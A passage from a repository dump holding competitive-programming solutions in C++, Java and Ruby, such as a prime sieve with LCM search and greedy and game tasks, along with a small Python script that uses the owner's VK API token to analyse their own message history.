a.begin() + j);\n //crcreg ^= FINALXOR;\n //for (int k = n - 1; k >= j; --k)\n //crcreg = (crcreg << 8) ^ rev_table[crcreg >> 24] ^ a[k];\n //forn(k, 4)\n //a[i + k] = (crcreg >> k * 8) & 0xFF;\n //writeln(a[j], a[j + 1], a[j + 2], a[j + 3]);\n //};\n\n fori(q)\n writeln(requests[i].ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4738546311855316, "alphanum_fraction": 0.49295774102211, "avg_line_length": 29.27941131591797, "blob_id": "db549735d2b76718ea2242b621fd5794b60e0294", "content_id": "80e9d8503af967d1e1ac4ce8213321108584a175", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6177, "license_type": "no_license", "max_line_length": 162, "num_lines": 204, "path": "/CodeForce/1154/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 07 August 2018 (&&, whole) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n#ifndef ONLINE_JUDGE\n# define N 10000\n#else\n# define N 10000001\n#endif\n\nvector<int> cache[N];\nint minPrime[N];\nint prev[N];\n\n//linearSieve\nstruct linearSieve\n{\n vector<int> primes;\n\n linearSieve()\n {\n for (int i = 2; i < N; i++)\n {\n if (minPrime[i] == 0)\n primes.push_back(i),\n minPrime[i] = i;\n for (int prime : primes)\n {\n int temp = prime * i;\n if (temp < N && prime <= minPrime[i])\n minPrime[temp] = prime,\n prev[temp] = i;\n else\n break;\n }\n }\n }\n\n void factorization(int x)\n {\n int X = x;\n if (SZ(cache[x])) return;\n vector<pii> temp;\n int p = -1;\n int pp = -1;\n while (x > 1)\n {\n pp = p;\n p = minPrime[x];\n if (p != pp)\n temp.pb({p, 1});\n else\n temp.back().second++;\n x = prev[x];\n }\n vector<int> divisors;\n function<void(int, int)> gen = [&](int v, int j) {\n if (j == SZ(temp))\n {\n if (v > 1)\n divisors.pb(v);\n return;\n }\n gen(v, j + 1);\n fori(temp[j].second)\n gen(v *= temp[j].first, j + 1);\n };\n gen(1, 0);\n cache[X] = divisors;\n }\n\n bool isPrime(int x)\n {\n return minPrime[x] == x;\n }\n};\n//Igorjan\n//}}}\n\nvoid run()\n{\n linearSieve s;\n //int q = 100; s.factorization(q); vector<int> f = cache[q]; writeln(SZ(f), f);\n //return;\n int n;\n scanf(\"%d\", &n);\n vi a(n);\n fori(n)\n scanf(\"%d\", &a[i]);\n int first = min_element(whole(a)) - a.begin();\n int second = -1;\n int mn = MOD;\n fori(n) if (i != first && mn > a[i]) mn = a[second = i];\n auto lcm = [&](int i, int j) {\n return a[i] * 1ll * a[j] / gcd(a[i], a[j]);\n };\n ll ans = lcm(first, second);\n vector<vector<int>> m(10000001);\n fori(n)\n {\n s.factorization(a[i]);\n const auto& f = cache[a[i]];\n //if (SZ(f) >= 300)\n //writeln(a[i], SZ(f));\n //continue;\n //if (i % 1000 == 0) writeln(i), writeln(SZ(f), a[i]), cout.flush();\n for (const int& d : f)\n {\n auto& temp = m[d];\n if (temp.size() <= 1)\n {\n temp.pb(i);\n if (temp.size() == 2 && a[temp[0]] > a[temp[1]])\n swap(temp[0], temp[1]);\n }\n else\n {\n if (a[temp[0]] > a[i])\n temp[1] = temp[0],\n temp[0] = i;\n else if (a[temp[1]] > a[i])\n temp[1] = i;\n }\n }\n }\n fori(N)\n if (const auto& temp = m[i]; temp.size() >= 2)\n if (ll l = a[temp[0]] / i * 1ll * a[temp[1]]; l < ans)\n ans = l,\n first = temp[0],\n second = temp[1];\n\n writeln(min(first, second) + 1, max(first, second) + 1);\n //cerr << lcm(first, second) << \"\\n\";\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>const&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.33988094329833984, "alphanum_fraction": 0.34166666865348816, "avg_line_length": 23.462121963500977, "blob_id": "a4285acacc51af5bc7d946525fd21df6a13ef3d5", "content_id": "13b5501d49e6516de11d9a9cf981d3ad4936301e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4711, "license_type": "no_license", "max_line_length": 78, "num_lines": 132, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/F.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.io.*;\r\n \r\nimport static java.lang.Math.*;\r\n \r\npublic class F {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n    final static Random rnd = new Random();\r\n \r\n    public void solve() {\r\n        int f = in.nextInt();\r\n        boolean ok = true;\r\n \r\n        for (int i = 0; i < f; i++) {\r\n            int t = in.nextInt(), n = in.nextInt();\r\n            boolean[] x = new boolean[t + 1], y = x.clone(), z;\r\n \r\n            Arrays.fill(x, true);\r\n \r\n            for (int j = 0; j < n; j++) {\r\n                Arrays.fill(y, false);\r\n                int l = in.nextInt(), r = in.nextInt();\r\n                int d = r - l;\r\n \r\n                for (int u = 0; u <= t; u++) {\r\n                    if (x[u]) {\r\n                        {\r\n                            int v = u + d;\r\n                            if (0 <= v && v <= t) {\r\n                                y[v] = true;\r\n                            }\r\n                        }\r\n                        {\r\n                            int v = u - d;\r\n                            if (0 <= v && v <= t) {\r\n                                y[v] = true;\r\n                            }\r\n                        }\r\n                    }\r\n                }\r\n \r\n \r\n                z = x;\r\n                x = y;\r\n                y = z;\r\n \r\n            }\r\n \r\n            boolean cur = false;\r\n \r\n            for (boolean val : x) {\r\n                cur |= val;\r\n            }\r\n            ok &= cur;\r\n        }\r\n \r\n        out.println(ok ? \"possible\" : \"impossible\");\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n            in.close();\r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        void close() throws IOException {\r\n            br.close();\r\n        }\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new F().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.5180788040161133, "alphanum_fraction": 0.5299514532089233, "avg_line_length": 27.218273162841797, "blob_id": "8c01565f65f218264d103285632649151403caa2", "content_id": "33289eaa71602731090dd57ee5d5cab5280f51f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5559, "license_type": "no_license", "max_line_length": 165, "num_lines": 197, "path": "/CodeForce/0521/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//Igorjan94, template version from 16 February 2015\n#include <bits/stdc++.h>\n/*\n#include <ext/rope>\n#include <ext/pb_ds/assoc_container.hpp>\n#include <ext/pb_ds/tree_policy.hpp>\n\nusing namespace __gnu_cxx;\nusing namespace __gnu_pbds;\ntypedef tree<int, int/null_type, less<int>, rb_tree_tag, tree_order_statistics_node_update> orderedMap;\n*/\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); it++)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define fst first\n#define snd second\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define eb emplace_back\n#define vs vector<string>\n#define pii pair<int, int>\n#define vll vector<long long>\n#define vvi vector<vector<int>>\n#define pll pair<long long, long long>\n#define elohw(a) a.rbegin(), a.rend()\n#define whole(a) a.begin(), a.end()\n#define next _next\n#define prev _prev\n\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n#define wr(args...) err(split(#args,',').begin(),args)\n\n#define FILENAME \"input\"\n#define INF 1000000009\n\n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n#define ints(args...) int args; readln(args)\n#define lls(args...) ll args; readln(args)\n#define vints(args...) vi args; readln(args)\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nstruct node\n{\n int x, y, v;\n\n node(int x, int y, int v)\n {\n this->x = x;\n this->y = y;\n this->v = v;\n }\n\n bool operator<(node const& b) const\n {\n if (x != b.x)\n return x < b.x;\n return y < b.y;\n }\n\n node(){}\n\n};\n\nbool cmp(node const& a, node const& b)\n{\n return a.v < b.v;\n}\n\nint x, y, v;\nmap<pii, int> a;\nset<node, bool(*)(node const&, node const&)> values(cmp);\n\nbool check(pii const& p)\n{\n#define x first\n#define y second\n for (int i = p.x - 1; i < p.x + 2; i++)\n if (a.find({i, p.y + 1}) != a.end())\n {\n int ok = 0;\n for (int j = i - 1; j < i + 2; j++)\n if (a.find({j, p.y}) != a.end())\n ok++;\n if (ok == 1)\n return false;\n }\n#undef x\n#undef y\n return true;\n}\n\nvoid run()\n{\n ints(n);\n fori(n)\n readln(x, y),\n a[{x, y}] = i;\n for (auto p : a)\n if (check(p.first))\n values.insert(node(p.first.first, p.first.second, p.second));\n ll answer = 0;\n fori(n)\n {\n if (values.size() == 0)\n {\n writeln(\"FUUUUUU\");\n return;\n }\n auto temp = i & 1 ? *values.begin() : *values.rbegin();\n answer = (answer * n + temp.v) % INF;\n values.erase(temp);\n a.erase({temp.x, temp.y});\n auto it = a.begin();\n for (int j = temp.x - 1; j < temp.x + 2; j++)\n if ((it = a.find({j, temp.y - 1})) != a.end())\n if (check({j, temp.y - 1}))\n values.insert(node(j, temp.y - 1, it->second));\n for (int j = temp.x - 2; j < temp.x + 3; j++)\n if ((it = a.find({j, temp.y})) != a.end())\n if (!check({j, temp.y}))\n values.erase(node(j, temp.y, it->second));\n }\n writeln(answer);\n}\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5199501514434814, "alphanum_fraction": 0.5361595749855042, "avg_line_length": 19.58974266052246, "blob_id": "c86d881d0f5d0e655c0766dfad99b15caa5f1549", "content_id": "a5ebdec05aeef3e02aaa154fa48decac7c529b5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 802, "license_type": "no_license", "max_line_length": 47, "num_lines": 39, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.28/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#define TASKNAME \"\"\n \n#include <bits/stdc++.h>\n \n#define mp make_pair\n#define pb push_back\n#define all(a) (a).begin(), (a).end()\n#define sz(a) (int)a.size()\n#define fst first\n#define snd second\n#define fori(n) for(int i = 0; i < n; ++i)\n#define fori1(n) for(int i = 1; i < n; ++i)\n#define forj(n) for(int j = 0; j < n; ++j)\n \nusing namespace std;\n \nconst double EPS = 1e-9;\nconst int INF = 1e9;\n \ntypedef long long ll;\ntypedef long double ld;\ntypedef vector<int> vi;\n \nint main() {\n// freopen(TASKNAME\".in\", \"r\", stdin);\n// freopen(TASKNAME\".out\", \"w\", stdout);\n int n;\n cin >> n;\n vi a(n);\n fori(n)\n cin >> a[i];\n sort(all(a));\n int i = 0;\n ll sum = 0;\n while (i < n - 1 && a[i] + sum <= a.back())\n sum += a[i++];\n cout << i + 1 << \"\\n\";\n return 0;\n}" }, { "alpha_fraction": 0.574018120765686, "alphanum_fraction": 0.5931520462036133, "avg_line_length": 20.56818199157715, "blob_id": "b66e7bd851dee7d3435e3f2cfac604dd04670ff3", "content_id": "3f4ae4c6d21d64e4b7b74747ae518267d4c0de0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 993, "license_type": "no_license", "max_line_length": 59, "num_lines": 44, "path": "/study/task7/Digit.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\r\n\r\nimport java.io.Serializable;\r\n\r\npublic class Digit implements Serializable {\r\n\tpublic int label;\r\n\tpublic final int len;\r\n\tpublic final int size;\r\n\tprivate final double[] signal;\r\n\r\n\tpublic Digit(double[] signal, int len, int label) {\r\n\t\tthis.size = len * len + 1;\r\n\t\tthis.signal = new double[len * len + 1];\r\n\t\tfor (int i = 0; i < size - 1; i++)\r\n\t\t\tthis.signal[i] = signal[i];\r\n\t\tthis.signal[size - 1] = -1;\r\n\t\tthis.label = label;\r\n\t\tthis.len = len;\r\n\t}\r\n\t\r\n\tpublic Digit(byte[] buffer, int off, int len, int label) {\r\n\t\tthis.len = len;\r\n\t\tthis.size = len * len + 1;\r\n\t\tthis.label = label;\r\n\t\tsignal = new double[size];\r\n\t\tfor (int i = 0; i < size - 1; i++)\r\n\t\t\tsignal[i] = (buffer[i + off] & 0xff) / 255.0;\r\n\t\tsignal[size - 1] = -1;\r\n\t}\r\n\r\n\tdouble getSignal(int i) {\r\n\t\treturn signal[i];\r\n\t}\r\n\r\n\tdouble getSignal(int x, int y) {\r\n\t\treturn signal[x + len * y];\r\n\t}\r\n\t\r\n\tdouble[] getSignal() {\r\n\t\treturn signal;\r\n\t}\r\n\r\n\tprivate static final long serialVersionUID = 10L;\r\n}\r\n" }, { "alpha_fraction": 0.6284486055374146, "alphanum_fraction": 0.6383016705513, "avg_line_length": 38.588653564453125, "blob_id": "62069082b9e547035b557e3e153c82db3f3475a2", "content_id": "9e8acf1c0eb38c45d1144ab8848ce0732899372d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5582, "license_type": "no_license", "max_line_length": 147, "num_lines": 141, "path": "/scripts/vk.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom library import *\n\ndef vk(method, **kwargs):\n params = dotdict(kwargs)\n if not 'v' in params: params.v = '5.92'\n params.access_token = loadJsonFromFile('~/.config/vk200/vk.json').vk.access_token\n ret = requests.get('https://api.vk.com/method/' + method, params = params).json()\n if 'error' in ret:\n print(f'Error in {method}: {ret.error.error_msg}', kwargs)\n return ret.error\n return ret.response\n\ndef unlimitedVk(method, field, max_count, verbose = False, **kwargs):\n def getter(**kwargs):\n return vk(method, **kwargs);\n return unlimited(getter, field, max_count, verbose = verbose, **kwargs)\n\ndef getPhoto(url, path, peer_id):\n files = {'photo': open(path, 'rb')}\n attach = requests.post(url, files = files)\n return vk('photos.saveMessagesPhoto', attach.json())[0]\n\ndef sendPhoto(paths, peer_id):\n url = vk('photos.getMessagesUploadServer', {'peer_id': peer_id})['upload_url']\n photos = [getPhoto(url, path, peer_id) for path in paths.split(' ')]\n strings = ['photo' + str(photo['owner_id']) + '_' + str(photo['id']) for photo in photos]\n vk('messages.send', {'attachment': ','.join(strings), 'random_id': random.randint(0, 2 ** 31), 'peer_id': peer_id})\n\ndef getMe():\n return vk('users.get')[0]\n\ndef getFriends():\n return unlimitedVk('friends.get', 'items', 5000, fields = 'nickname') + [getMe()]\n\ndef getChats():\n return list(filter(lambda conversation: conversation.conversation.peer.type == 'chat', unlimitedVk('messages.getConversations', 'items', 200)))\n\ndef getFriendsDict():\n return dict(map(lambda user: (str(user.id), user.first_name + ' ' + user.last_name), getFriends()))\n\ndef getChatsDict():\n return dict(map(lambda chat: (str(chat.conversation.peer.id), chat.conversation.chat_settings.title), getChats()))\n\ndef getConversations():\n cacheFriends = '~/.cache/vk200/friends.json'\n friends = loadJsonFromFile(cacheFriends)\n if friends is None:\n friends = {**getChatsDict(), **getFriendsDict()}\n saveJsonInFile(friends, cacheFriends)\n return friends\n\[email protected]()\[email protected]('-f', '--filename', help='input file', type=click.File('r'), default='./corpuses/corpus.json')\[email protected]('-o', '--output', help='output file', type=click.File('w'), default='./corpuses/corpus.txt')\ndef jsonCorpusToTxt(filename, output):\n j = loadJsonFromFile(filename)\n for k, v in j.items():\n output.write(str(v) + ' ' + k + '\\n')\n output.close()\n\[email protected]()\[email protected]('-f', '--filename', help='output file', type=click.File('w'), default='./corpuses/corpus.json')\[email protected]('-o', '--out', is_flag=True, help='inbox/outbox messages', default=True)\[email protected]('-m', '--max_iterations', type=int, help='count of pages of messages', default=-1)\[email protected]('peer_id', required=True, type=click_completion.DocumentedChoice(getConversations()), nargs=1)\ndef getMessagesCorpus(peer_id, out, filename, max_iterations):\n import re\n MAX_COUNT = 200\n messages = unlimitedVk('messages.getHistory', 'items', MAX_COUNT, True, peer_id = peer_id, max_iterations = max_iterations)\n messages = list(map(lambda message: message.text.lower(), filter(lambda message: not (message.out ^ out), messages)))\n words = []\n for message in messages:\n words += re.split(r'[^\\w\\s\\d-]|\\n', message)\n words = list(filter(len, words))\n corpus = {}\n for word in words:\n word = word.split()\n for j in range(1, 4):\n for i in range(len(word) - j + 1):\n temp = ' '.join(word[i + k] for k in range(j))\n corpus[temp] = corpus.get(temp, 0) + 1\n c = []\n saveJsonInFile(corpus, filename)\n\[email protected]()\[email protected]('peer_ids', required=True, type=click_completion.DocumentedChoice(getConversations()), nargs=-1)\[email protected]('-s', '--stacked', is_flag=True, help='Stacked mode', default=True)\[email protected]('-d', '--separated', is_flag=True, help='Stat for one dialog', default=False)\ndef histogramMessagesByDate(peer_ids, stacked, separated):\n from datetime import datetime\n import matplotlib.pyplot as plt\n import matplotlib.dates as mdates\n import numpy\n\n friends = getConversations()\n MAX_COUNT = 200\n DATE_FORMAT = '%d-%m-%y'\n\n users = {}\n legend = []\n days = []\n dates = []\n\n def getDate(message):\n return message.date\n\n def add(curr, peer_id):\n if not peer_id in friends: return\n temp = (curr[0] - curr[-1]) // (24 * 60 * 60)\n days.append(temp)\n dates.append(curr)\n legend.append(f'{friends[peer_id]}, {temp} days long, {len(curr)} messages')\n\n for peer_id in peer_ids:\n curr = unlimitedVk('messages.getHistory', 'items', MAX_COUNT, True, peer_id = peer_id)\n for message in curr:\n peer_id = str(message.from_id if separated else peer_ids[0])\n if not peer_id in users:\n users[peer_id] = []\n users[peer_id].append(getDate(message))\n\n for peer_id, curr in users.items():\n add(curr, peer_id)\n\n fig, ax = plt.subplots(1, 1)\n datelist = []\n for xx in dates:\n cur = numpy.array(list(map(lambda x: x * 1000, xx)), dtype='datetime64[ms]')\n datelist.append(list(map(int, mdates.date2num(cur))))\n\n ax.hist(datelist, bins=max(days), stacked=stacked)\n ax.legend(legend)\n ax.xaxis.set_major_formatter(mdates.DateFormatter(DATE_FORMAT))\n plt.xlabel('Date')\n plt.ylabel('Count of messages')\n plt.show()\n\nif __name__ == \"__main__\":\n completion()\n" }, { "alpha_fraction": 0.5102040767669678, "alphanum_fraction": 0.5306122303009033, "avg_line_length": 23.5, "blob_id": "709269baafd582d462c16ad63d3b8558c0417e4d", "content_id": "71cdee77734a4dbdb5181cace62ebeae3cb6d991", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 49, "license_type": "no_license", "max_line_length": 32, "num_lines": 2, "path": "/2017/newYear/A.rb", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "b, c, d = gets.split.map(&:to_i)\nprint c - d + 1\n" }, { "alpha_fraction": 0.35841837525367737, "alphanum_fraction": 0.37372449040412903, "avg_line_length": 23.5, "blob_id": "62331f231e73229ca0865619f8eaf408b8a9f537", "content_id": "feaf5b0cbba5191d252344770ab8d63d9634d271", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 784, "license_type": "no_license", "max_line_length": 62, "num_lines": 32, "path": "/TopCoder/TCO1A/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define fori(n) for(int i = 0; i < (int) (n); i++)\n#define forj(n) for(int j = 0; j < (int) (n); j++)\n\nusing namespace std;\nclass Similars \n{\npublic:\n int maxsim(int L, int R) \n {\n int ans = 0;\n set<int> a;\n for (int i = L; i <= R; i++)\n {\n int j = i;\n int temp = 0;\n while (j >= 10)\n temp |= (1 << (j % 10)),\n j /= 10;\n temp |= (1 << j);\n if (a.find(temp) != a.end())\n ans = max(ans, __builtin_popcount(temp));\n a.insert(temp);\n }\n for (auto x : a)\n for (auto y : a)\n if (x != y)\n ans = max(ans, __builtin_popcount(x & y));\n return ans;\n }\n};\n" }, { "alpha_fraction": 0.3055555522441864, "alphanum_fraction": 0.3055555522441864, "avg_line_length": 4.538461685180664, "blob_id": "1fd819b495c92bd7926b4eceb0a346958e8c4db0", "content_id": "f440db3ce2942ad0b8ac2c4ed3b0e1330bd797ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 72, "license_type": "no_license", "max_line_length": 13, "num_lines": 13, "path": "/CodeForce/1663/H.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//\\\n(*\nint main() {}\n//\\\n*)\n//\\\nbegin\n//\\\n writeln();\n//\\\nend.\n//\\\n*/\n" }, { "alpha_fraction": 0.44977569580078125, "alphanum_fraction": 0.4613337516784668, "avg_line_length": 23.766477584838867, "blob_id": "e13969cc143eb101e3236109585b74b3029bb171", "content_id": "dcbad0d0da5f32dd2b44cb3623889ad791b16f14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 13151, "license_type": "no_license", "max_line_length": 174, "num_lines": 531, "path": "/CodeForce/1751/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n \nusing namespace std;\n \n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n \ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n \n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n \n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n \n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n \nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n \n//Igorjan\n//umax\ntemplate<typename T1, typename T2>\nT1 umax(T1& a, T2 b)\n{\n return a < T2(b) ? a = b : a;\n}\n 